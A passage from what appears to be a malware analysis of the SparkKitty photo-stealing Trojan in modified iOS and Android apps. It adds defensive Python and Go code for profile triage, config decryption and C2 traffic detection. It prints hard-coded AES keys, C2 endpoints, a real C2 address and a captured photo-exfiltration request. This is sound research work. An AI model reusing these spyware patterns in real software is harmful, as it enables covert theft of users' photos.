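# Constructed sample: the plist from the profile quoted above with the certificate
# and DER-encoded copy omitted, wrapped in a few arbitrary bytes that stand in for
# the CMS (PKCS#7) signature envelope of a real .mobileprovision file.
SAMPLE_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
  <key>AppIDName</key><string>rdcUniApp</string>
  <key>CreationDate</key><date>2025-01-20T06:59:55Z</date>
  <key>ExpirationDate</key><date>2026-01-20T06:59:55Z</date>
  <key>Name</key><string>syf</string>
  <key>ProvisionsAllDevices</key><true/>
  <key>TeamIdentifier</key><array><string>EHQ3N2D5WH</string></array>
  <key>TeamName</key><string>SINOPEC SABIC Tianjin Petrochemical Co. Ltd.</string>
  <key>Entitlements</key>
  <dict>
    <key>application-identifier</key><string>EHQ3N2D5WH.com.ss-tpc.rd.rdcUniApp</string>
    <key>get-task-allow</key><false/>
    <key>com.apple.developer.team-identifier</key><string>EHQ3N2D5WH</string>
  </dict>
</dict>
</plist>
"""
SAMPLE_MOBILEPROVISION = b"\x30\x82\x0b\xad\x06\x09\x2a\x86" + SAMPLE_PLIST + b"\x00" * 32


def extract_plist(profile: bytes) -> dict:
    """Cut the XML plist out of the signature envelope (no signature check).

    Verifying the CMS signature needs Apple's WWDR chain and an ASN.1 parser;
    for triage, the signed content is what carries the useful fields.
    """
    start = profile.find(b"<?xml")
    if start < 0:
        raise ValueError("no embedded plist found")
    end = profile.find(b"</plist>", start)
    if end < 0:
        raise ValueError("embedded plist is truncated")
    return plistlib.loads(profile[start:end + len(b"</plist>")])


def profile_kind(p: dict) -> str:
    """Classify a profile by the keys that decide where it may be installed."""
    if p.get("ProvisionsAllDevices") is True:
        return "enterprise"     # in-house distribution: any device, no App Store review
    if "ProvisionedDevices" in p:
        # A fixed UDID list: development if debuggable, otherwise Ad Hoc.
        return "development" if p.get("Entitlements", {}).get("get-task-allow") else "ad-hoc"
    return "app-store"          # neither key: only valid for App Store-delivered builds


def triage(profile: bytes, now: Union[datetime, str, None] = None) -> dict:
    """Summarise the fields an analyst checks first on a sideloaded app's profile."""
    p = extract_plist(profile)
    if now is None:
        now = datetime.now(timezone.utc)
    elif isinstance(now, str):
        now = datetime.fromisoformat(now)
    if now.tzinfo is None:
        now = now.replace(tzinfo=timezone.utc)
    expires = p["ExpirationDate"]
    if expires.tzinfo is None:                       # plistlib yields naive UTC datetimes
        expires = expires.replace(tzinfo=timezone.utc)
    ents = p.get("Entitlements", {})
    return {
        "kind": profile_kind(p),
        "team_id": p.get("TeamIdentifier", ["?"])[0],
        "team_name": p.get("TeamName"),
        "app_id": ents.get("application-identifier"),
        "expires": expires.isoformat(),
        "expired": now > expires,
        "debuggable": bool(ents.get("get-task-allow")),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_MOBILEPROVISION).items():
        print(f"{key:11} {value}")
```

<p>For the profile quoted above the script reports <code>kind: enterprise</code>, a team ID and team name belonging to a petrochemical company, and an application identifier that has nothing to do with TikTok, which is exactly the mismatch a reviewer should refuse. On macOS, <code>security cms -D -i profile.mobileprovision</code> performs the same extraction while also checking the CMS signature; the Python version is for pipelines where no Apple tooling is available.</p>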
<h2 id="looking-for-copper-found-gold">Looking for copper, found gold</h2>
<p>Just like its Android counterpart, the installed iOS app contained a library that embedded links to a suspicious store within the user’s profile window. Tapping these opened them in WebView.</p>
<div id="attachment_116797" style="width: 1946px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/22235820/sparkkitty-ios3.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-116797" class="size-full wp-image-116797" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/22235820/sparkkitty-ios3.png" alt="Suspicious store opened inside a TikTok app" width="1936" height="2048" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/22235820/sparkkitty-ios3.png 1936w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/22235820/sparkkitty-ios3-284x300.png 284w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/22235820/sparkkitty-ios3-968x1024.png 968w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/22235820/sparkkitty-ios3-768x812.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/22235820/sparkkitty-ios3-1452x1536.png 1452w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/22235820/sparkkitty-ios3-331x350.png 331w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/22235820/sparkkitty-ios3-740x783.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/22235820/sparkkitty-ios3-265x280.png 265w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/22235820/sparkkitty-ios3-800x846.png 800w" sizes="auto, (max-width: 1936px) 100vw, 1936px" /></a><p id="caption-attachment-116797" class="wp-caption-text">Suspicious store opened inside a TikTok app</p></div>
<p>It seemed like a straightforward case: another mod of a popular app trying to make some money. However, one strange detail in the iOS version caught our attention. On every launch, the app requested access to the user’s photo gallery – highly unusual behavior for the original TikTok. Furthermore, the library containing the store didn’t have code accessing the photo gallery, and the Android version never requested image permissions. We were compelled to dig a little deeper and examine the app’s other dependencies. This led to the discovery of a malicious module pretending to be <strong>AFNetworking.framework</strong>. For a touch of foreshadowing, let’s spotlight a curious detail: certain apps referred to it as <strong>Alamofire.framework</strong>, but the code itself stayed exactly the same. The original version of AFNetworking is an open-source library that provides developers with a set of interfaces for convenient network operations.</p>
<p>The malicious version differs from the original by a modified <strong>AFImageDownloader</strong> class and an added <strong>AFImageDownloaderTool</strong> class. Interestingly, the authors didn’t create separate initialization functions or alter the library’s exported symbols to launch the malicious payload. Instead, they took advantage of a feature of the Objective-C runtime: a class may implement a special <code>+load</code> method, which the runtime calls automatically as soon as the image containing the class is loaded, before <code>main()</code> runs and without the host app ever calling into the framework. In this case, the entry point for the malicious payload was the <code>+[AFImageDownloader load]</code> selector, which does not exist in the original framework.</p>
<div id="attachment_116798" style="width: 743px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/22235922/sparkkitty-ios4.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-116798" class="size-full wp-image-116798" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/22235922/sparkkitty-ios4.png" alt="Malicious class entry point" width="733" height="206" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/22235922/sparkkitty-ios4.png 733w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/22235922/sparkkitty-ios4-300x84.png 300w" sizes="auto, (max-width: 733px) 100vw, 733px" /></a><p id="caption-attachment-116798" class="wp-caption-text">Malicious class entry point</p></div>
<p>The malicious payload functions as follows:</p>
<ol>
<li>It checks if the value of the <code>ccool</code> key in the app’s main <strong>Info.plist</strong> configuration file matches the string <code>77e1a4d360e17fdbc</code>. If the two differ, the malicious payload will not proceed.</li>
<li>It retrieves the Base64-encoded value of the <code>ccc</code> key from the framework’s <strong>Info.plist</strong> file. This value is decoded and then decrypted using <strong>AES-256</strong> in <strong>ECB</strong> mode with the key <code>p0^tWut=pswHL-x>>:m?^.^)W</code> padded with nulls to reach a length of 32 bytes. Some samples were also observed using the key <code>J9^tMnt=ptfHL-x>>:m!^.^)A</code>. If there’s no <code>ccc</code> key in the configuration or the key’s value is empty, the malware attempts to use the key <code>com.tt.cf</code> to retrieve an encrypted string from <strong>UserDefaults</strong>, the per-app key-value store that persists between launches.</li>
<li>The decrypted value is a list of URLs. From each of them the malware fetches a second stage encrypted with the same key and mode; that ciphertext decrypts to the set of C2 addresses used for exfiltrating stolen photos. Because the key is hard-coded and ECB uses no IV, both stages can be decrypted offline by anyone holding the sample, and the key string itself is a stable indicator across the samples that share it.</li>
<li>The final step before uploading the photos is to receive authorization from the C2 server. To do this, the malware sends a GET request to the <strong>/api/getImageStatus</strong> endpoint, transmitting app details and the user’s UUID. The server responds with the following JSON:
<pre class="urvanov-syntax-highlighter-plain-tag">{"msg":"success","code":0,"status":"1"}</pre>
The <code>code</code> field tells the app whether to repeat the request after a delay, with 0 meaning no, and the <code>status</code> field indicates whether it has permission to upload the photos.</li>
<li>Next, the malware requests access to the user’s photo gallery. It then registers a callback function to monitor for any changes within the gallery. The malware exfiltrates any accessible photos that have not already been uploaded. To keep track of which photos have been stolen, it creates a local database. If the gallery is modified while the app is running, the malware will attempt to access and upload the new images to the C2 server.</li>
</ol>
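<p>To make steps 1 to 3 concrete, here is an added example written in Go for this page (not code from the sample or from the original analysis). It reproduces the Info.plist gate, the null-padded 32-byte key, Base64 decoding and AES-256-ECB decryption of the <code>ccc</code> value. Two details the write-up does not state are assumptions and are marked as such in the code: PKCS#7 padding and newline-separated URLs. The ciphertext is constructed inside the program with the same key so it runs offline, and the hosts in it are placeholders rather than addresses from the campaign.</p>

```go
package main

import (
	"bytes"
	"crypto/aes"
	"encoding/base64"
	"errors"
	"fmt"
	"strings"
)

// Values quoted in the write-up: the Info.plist gate and the ASCII key that
// the sample null-pads to 32 bytes.
const (
	gateKey   = "ccool"
	gateValue = "77e1a4d360e17fdbc"
	aesKey    = "p0^tWut=pswHL-x>>:m?^.^)W"
)

// padKey copies the ASCII key into a zeroed 32-byte buffer (AES-256).
func padKey(k string) []byte {
	out := make([]byte, 32)
	copy(out, k)
	return out
}

// gateOpen mirrors step 1: proceed only if the host app's main Info.plist
// carries the expected marker value.
func gateOpen(mainPlist map[string]string) bool {
	return mainPlist[gateKey] == gateValue
}

// pkcs7Unpad strips PKCS#7 padding. ASSUMPTION: the article does not name
// the padding scheme; PKCS#7 is the CommonCrypto default.
func pkcs7Unpad(b []byte) ([]byte, error) {
	n := int(b[len(b)-1])
	if n == 0 || n > aes.BlockSize || n > len(b) ||
		!bytes.Equal(b[len(b)-n:], bytes.Repeat([]byte{byte(n)}, n)) {
		return nil, errors.New("bad padding (wrong key or corrupt data)")
	}
	return b[:len(b)-n], nil
}

// decryptConfig mirrors steps 2 and 3: Base64-decode, AES-256-ECB decrypt,
// then split into URLs. ASSUMPTION: one URL per line.
func decryptConfig(b64, key string) ([]string, error) {
	ct, err := base64.StdEncoding.DecodeString(b64)
	if err != nil {
		return nil, err
	}
	if len(ct) == 0 || len(ct)%aes.BlockSize != 0 {
		return nil, errors.New("ciphertext is not a whole number of AES blocks")
	}
	block, err := aes.NewCipher(padKey(key))
	if err != nil {
		return nil, err
	}
	pt := make([]byte, len(ct))
	// ECB: every 16-byte block is decrypted independently; there is no IV.
	for i := 0; i < len(ct); i += aes.BlockSize {
		block.Decrypt(pt[i:i+aes.BlockSize], ct[i:i+aes.BlockSize])
	}
	if pt, err = pkcs7Unpad(pt); err != nil {
		return nil, err
	}
	var urls []string
	for _, line := range strings.Split(string(pt), "\n") {
		if s := strings.TrimSpace(line); s != "" {
			urls = append(urls, s)
		}
	}
	return urls, nil
}

// encryptConfig is the inverse, used only to build a constructed sample so
// the program runs without a real ccc value.
func encryptConfig(urls []string, key string) string {
	pt := []byte(strings.Join(urls, "\n"))
	n := aes.BlockSize - len(pt)%aes.BlockSize
	pt = append(pt, bytes.Repeat([]byte{byte(n)}, n)...)
	block, _ := aes.NewCipher(padKey(key))
	ct := make([]byte, len(pt))
	for i := 0; i < len(pt); i += aes.BlockSize {
		block.Encrypt(ct[i:i+aes.BlockSize], pt[i:i+aes.BlockSize])
	}
	return base64.StdEncoding.EncodeToString(ct)
}

func main() {
	// Constructed sample with placeholder hosts, not addresses from the campaign.
	ccc := encryptConfig([]string{"http://cfg.example/a", "http://cfg.example/b"}, aesKey)
	if !gateOpen(map[string]string{"ccool": gateValue}) {
		return // payload stays dormant
	}
	urls, err := decryptConfig(ccc, aesKey)
	if err != nil {
		panic(err)
	}
	fmt.Println("config URLs:", urls)
}
```

<p>The same routine decrypts the second-stage C2 list, since key and mode do not change between stages. A failed unpad is the usual sign that a sample uses the alternative key quoted above; trying both keys is cheap.</p>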
<div id="attachment_116799" style="width: 1318px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23000209/sparkkitty-ios5.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-116799" class="size-full wp-image-116799" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23000209/sparkkitty-ios5.png" alt="Photo exfiltration and upload" width="1308" height="788" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23000209/sparkkitty-ios5.png 1308w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23000209/sparkkitty-ios5-300x181.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23000209/sparkkitty-ios5-1024x617.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23000209/sparkkitty-ios5-768x463.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23000209/sparkkitty-ios5-330x200.png 330w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23000209/sparkkitty-ios5-581x350.png 581w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23000209/sparkkitty-ios5-740x446.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23000209/sparkkitty-ios5-465x280.png 465w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23000209/sparkkitty-ios5-800x482.png 800w" sizes="auto, (max-width: 1308px) 100vw, 1308px" /></a><p id="caption-attachment-116799" class="wp-caption-text">Photo exfiltration and upload</p></div>
<p>Data transmission is performed directly within the selector <code>[AFImageDownloader receiptID:andPicID:]</code> by making a PUT request to the <strong>/api/putImages</strong> endpoint. In addition to the image itself, information about the app and the device, along with unique user identifiers, is also sent to the server.</p><pre class="urvanov-syntax-highlighter-plain-tag">PUT /api/putImages HTTP/1.1
Host: 23.249.28.88:7777
Content-Type: multipart/form-data; boundary=Boundary+C9D8BE3781515E01
Connection: keep-alive
Accept: */*
User-Agent: TikTok/31.4.0 (iPhone; iOS 14.8; Scale/3.00)
Accept-Language: en-US;q=1, ja-US;q=0.9, ar-US;q=0.8, ru-US;q=0.7
Content-Length: 80089
Accept-Encoding: gzip, deflate
--Boundary+C9D8BE3781515E01
Content-Disposition: form-data; name="appname"
TikTok
--Boundary+C9D8BE3781515E01
Content-Disposition: form-data; name="buid"
com.zhiliaoapp.musically
--Boundary+C9D8BE3781515E01
Content-Disposition: form-data; name="device"
ios
--Boundary+C9D8BE3781515E01
Content-Disposition: form-data; name="userId"
xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx
--Boundary+C9D8BE3781515E01
Content-Disposition: form-data; name="uuid"
xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx/Lx/xxx
--Boundary+C9D8BE3781515E01
Content-Disposition: form-data; name="image"; filename="<name>"
Content-Type: image/jpeg
......JFIF.....H.H.....LExif..MM.*...................i.........&.................e.......... ........8Photoshop 3.0.8BIM........8BIM.%................ ...B~...4ICC_PROFILE......$appl....mntrRGB XYZ .......</pre><p>
<h2 id="digging-deeper">Digging deeper</h2>
<p>When we found a spyware component in the modified iOS version of TikTok, we immediately wondered if the Trojan had an Android counterpart. Our initial search led us to a bunch of cryptocurrency apps. These apps had malicious code embedded in their entry points. It requests a configuration file with C2 addresses and then decrypts it using AES-256 in ECB mode. These decrypted addresses are then used by the Trojan to send a GET request to <strong>/api/anheartbeat</strong>. The request includes information about the infected app. The Trojan expects a JSON response. If the <code>code</code> field is 0, it means communication with that C2 is allowed. The <code>status</code> flag in the JSON determines whether the Trojan can send the victim’s images to the server.</p>
<div id="attachment_116801" style="width: 714px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23001139/sparkkitty-ios6.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-116801" class="size-full wp-image-116801" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23001139/sparkkitty-ios6.png" alt="Checking C2 addresses" width="704" height="352" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23001139/sparkkitty-ios6.png 704w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23001139/sparkkitty-ios6-300x150.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23001139/sparkkitty-ios6-700x350.png 700w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23001139/sparkkitty-ios6-560x280.png 560w" sizes="auto, (max-width: 704px) 100vw, 704px" /></a><p id="caption-attachment-116801" class="wp-caption-text">Checking C2 addresses</p></div>
<p>The main functionality of this malware – stealing images from the gallery – works in two stages. First, the malware checks the <code>status</code> flag. If it’s set to allow file uploads, the Trojan then checks the contents of a file named <strong>aray/cache/devices/.DEVICES</strong> on external storage. The first time it runs, the Trojan writes a hexadecimal number to this file. The number is an MD5 hash of a string containing the infected device’s IMEI, MAC address, and a random UUID. The content of this file is then compared to the string <code>B0B5C3215E6D</code>. If the content is different, the Trojan uploads images from the gallery, along with infected device info, to the command server via a PUT request to <strong>/api/putDataInfo</strong>. If the content is the same, it only uploads the third image from the end of an alphabetically sorted list. It’s highly likely the attackers use this specific functionality for debugging their malicious code.</p>
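<p>On both platforms the traffic shares one API surface: a GET check-in to <strong>/api/getImageStatus</strong> or <strong>/api/anheartbeat</strong> (and <strong>/api/getStatus</strong> in the libcrypto variant discussed later), answered with a JSON <code>code</code>/<code>status</code> pair, followed by a multipart PUT to <strong>/api/putImages</strong> or <strong>/api/putDataInfo</strong>. The following added example, written in Go for this page and not code from the campaign or the original analysis, parses raw HTTP requests and classifies them against that pattern. The field set it checks (<code>appname</code>, <code>buid</code>, <code>device</code>, <code>userId</code>, <code>uuid</code>, <code>image</code>) is the one from the iOS capture above; the sample request is constructed in the program with placeholder values rather than taken from a real device.</p>

```go
package main

import (
	"bufio"
	"bytes"
	"fmt"
	"mime/multipart"
	"net/http"
	"strings"
)

// Paths quoted in the write-up. Hosts are deliberately not part of the
// signature: the C2 addresses rotate, the API surface did not.
var uploadPaths = map[string]string{
	"/api/putImages":   "iOS AFNetworking variant",
	"/api/putDataInfo": "Android variant",
}
var checkinPaths = map[string]bool{
	"/api/getImageStatus": true,
	"/api/anheartbeat":    true,
	"/api/getStatus":      true,
}

// Field names from the iOS capture; the Android field set is not documented.
var uploadFields = []string{"appname", "buid", "device", "userId", "uuid", "image"}

// Verdict is what a detection pipeline would attach to one request.
type Verdict struct {
	Hit    bool
	Reason string
}

// classify parses one raw HTTP request (as pulled from a proxy log or PCAP)
// and flags the check-in and upload patterns. Image bytes are never retained.
func classify(raw string) (Verdict, error) {
	req, err := http.ReadRequest(bufio.NewReader(strings.NewReader(raw)))
	if err != nil {
		return Verdict{}, err
	}
	path := req.URL.Path
	if req.Method == http.MethodGet && checkinPaths[path] {
		return Verdict{true, "C2 check-in: GET " + path}, nil
	}
	variant, isUpload := uploadPaths[path]
	if req.Method != http.MethodPut || !isUpload {
		return Verdict{}, nil
	}
	// A path match alone is weak; confirm the multipart layout seen in the capture.
	if err := req.ParseMultipartForm(4 << 20); err != nil {
		return Verdict{true, "PUT " + path + " with non-multipart body"}, nil
	}
	var missing []string
	for _, f := range uploadFields {
		_, inValues := req.MultipartForm.Value[f]
		_, inFiles := req.MultipartForm.File[f]
		if !inValues && !inFiles {
			missing = append(missing, f)
		}
	}
	if len(missing) > 0 {
		return Verdict{true, fmt.Sprintf("PUT %s (%s), fields missing: %v", path, variant, missing)}, nil
	}
	return Verdict{true, fmt.Sprintf("photo exfiltration: PUT %s (%s), full field set", path, variant)}, nil
}

// buildUpload constructs a request in the shape of the iOS capture.
// All values are placeholders, not data from a real device.
func buildUpload() string {
	var body bytes.Buffer
	w := multipart.NewWriter(&body)
	fields := map[string]string{
		"appname": "TikTok", "buid": "com.zhiliaoapp.musically", "device": "ios",
		"userId": "00000000-0000-0000-0000-000000000000",
		"uuid":   "00000000-0000-0000-0000-000000000000/L0/000",
	}
	for k, v := range fields {
		_ = w.WriteField(k, v)
	}
	fw, _ := w.CreateFormFile("image", "IMG_0001.jpg")
	_, _ = fw.Write([]byte{0xFF, 0xD8, 0xFF, 0xE0}) // JPEG SOI/APP0 marker bytes only
	_ = w.Close()
	return fmt.Sprintf("PUT /api/putImages HTTP/1.1\r\nHost: c2.example:7777\r\n"+
		"Content-Type: %s\r\nContent-Length: %d\r\n\r\n%s",
		w.FormDataContentType(), body.Len(), body.String())
}

func main() {
	samples := []string{
		buildUpload(),
		"GET /api/anheartbeat?buid=x&appname=y HTTP/1.1\r\nHost: c2.example\r\n\r\n",
		"GET /index.html HTTP/1.1\r\nHost: www.example\r\n\r\n",
	}
	for _, s := range samples {
		v, err := classify(s)
		if err != nil {
			fmt.Println("parse error:", err)
			continue
		}
		fmt.Printf("hit=%v %s\n", v.Hit, v.Reason)
	}
}
```

<p>Keying on path plus multipart layout rather than on the server address keeps the rule useful after the C2 moves. The <code>User-Agent</code> is not a usable discriminator here: it is the host app’s own, which is exactly why the upload blends into legitimate TikTok traffic.</p>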
<div id="attachment_116802" style="width: 692px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23001309/sparkkitty-ios7.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-116802" class="size-full wp-image-116802" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23001309/sparkkitty-ios7.png" alt="Uploading image and device information" width="682" height="622" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23001309/sparkkitty-ios7.png 682w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23001309/sparkkitty-ios7-300x274.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23001309/sparkkitty-ios7-384x350.png 384w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23001309/sparkkitty-ios7-307x280.png 307w" sizes="auto, (max-width: 682px) 100vw, 682px" /></a><p id="caption-attachment-116802" class="wp-caption-text">Uploading image and device information</p></div>
<p>Later, we discovered other versions of this Trojan embedded in casino apps. These were loaded using the LSPosed framework, which is designed for app code hooking. Essentially, these Trojan versions acted as malicious Xposed modules. They would hook app entry points and execute code similar to the malware we described earlier, but with a few interesting twists:</p>
<ol>
<li>The C2 address storage was located in both the module’s resources and directly within the malware code. Typically, these were two different addresses, and both were used to obtain C2 information.</li>
</ol>
<div id="attachment_116803" style="width: 885px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23001500/sparkkitty-ios8.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-116803" class="size-full wp-image-116803" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23001500/sparkkitty-ios8.png" alt="Procedure for obtaining C2 addresses" width="875" height="670" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23001500/sparkkitty-ios8.png 875w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23001500/sparkkitty-ios8-300x230.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23001500/sparkkitty-ios8-768x588.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23001500/sparkkitty-ios8-457x350.png 457w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23001500/sparkkitty-ios8-740x567.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23001500/sparkkitty-ios8-366x280.png 366w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23001500/sparkkitty-ios8-800x613.png 800w" sizes="auto, (max-width: 875px) 100vw, 875px" /></a><p id="caption-attachment-116803" class="wp-caption-text">Procedure for obtaining C2 addresses</p></div>
<ol start="2">
<li>Among the decrypted C2 addresses, the Trojan picks the one corresponding to the fastest server. It does this by sending a request to each server sequentially. If the request is successful, it records the response time. The shortest time then determines which C2 server is used. Note that this algorithm could have been implemented without needing to store intermediate values.</li>
</ol>
<div id="attachment_116804" style="width: 665px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23001948/sparkkitty-ios9.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-116804" class="size-full wp-image-116804" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23001948/sparkkitty-ios9.png" alt="Finding the shortest response time" width="655" height="494" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23001948/sparkkitty-ios9.png 655w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23001948/sparkkitty-ios9-300x226.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23001948/sparkkitty-ios9-200x150.png 200w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23001948/sparkkitty-ios9-464x350.png 464w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23001948/sparkkitty-ios9-371x280.png 371w" sizes="auto, (max-width: 655px) 100vw, 655px" /></a><p id="caption-attachment-116804" class="wp-caption-text">Finding the shortest response time</p></div>
<ol start="3">
<li>The code uses custom names for classes, methods, and fields.</li>
<li>It is written in Kotlin. Other versions we found were written in Java.</li>
</ol>
<h2 id="spyware-in-official-app-stores">Spyware in official app stores</h2>
<p>One of the Android Java apps containing a malicious payload was a messaging app with crypto exchange features. This app was uploaded to Google Play and installed over 10,000 times. It was still available in the store at the time of this research. We notified Google about it, and they removed the app from the store.</p>
<div id="attachment_116805" style="width: 1497px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23003441/sparkkitty-ios10.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-116805" class="size-full wp-image-116805" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23003441/sparkkitty-ios10.png" alt="Infected app on Google Play" width="1487" height="1072" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23003441/sparkkitty-ios10.png 1487w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23003441/sparkkitty-ios10-300x216.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23003441/sparkkitty-ios10-1024x738.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23003441/sparkkitty-ios10-768x554.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23003441/sparkkitty-ios10-485x350.png 485w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23003441/sparkkitty-ios10-740x533.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23003441/sparkkitty-ios10-388x280.png 388w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23003441/sparkkitty-ios10-800x577.png 800w" sizes="auto, (max-width: 1487px) 100vw, 1487px" /></a><p id="caption-attachment-116805" class="wp-caption-text">Infected app on Google Play</p></div>
<p>Another infected Android app we discovered is named 币coin and distributed through unofficial sources. However, it also has an iOS version. We found it on the App Store and alerted Apple to the presence of the infected app in their store.</p>
<div id="attachment_116806" style="width: 1946px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23003550/sparkkitty-ios11.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-116806" class="size-full wp-image-116806" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23003550/sparkkitty-ios11.png" alt="Infected app page on the App Store" width="1936" height="2048" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23003550/sparkkitty-ios11.png 1936w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23003550/sparkkitty-ios11-284x300.png 284w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23003550/sparkkitty-ios11-968x1024.png 968w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23003550/sparkkitty-ios11-768x812.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23003550/sparkkitty-ios11-1452x1536.png 1452w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23003550/sparkkitty-ios11-331x350.png 331w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23003550/sparkkitty-ios11-740x783.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23003550/sparkkitty-ios11-265x280.png 265w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/06/23003550/sparkkitty-ios11-800x846.png 800w" sizes="auto, (max-width: 1936px) 100vw, 1936px" /></a><p id="caption-attachment-116806" class="wp-caption-text">Infected app page on the App Store</p></div>
<p>In both the Android and iOS versions, the malicious payload was part of the app itself, not of a third-party SDK or framework. In the iOS version, the central <code>AppDelegate</code> class, which manages the app’s lifecycle, registers its selector <code>[AppDelegate requestSuccess:]</code> as a handler for responses returned by requests sent to <strong>i.bicoin[.]com[.]cn</strong>.</p>
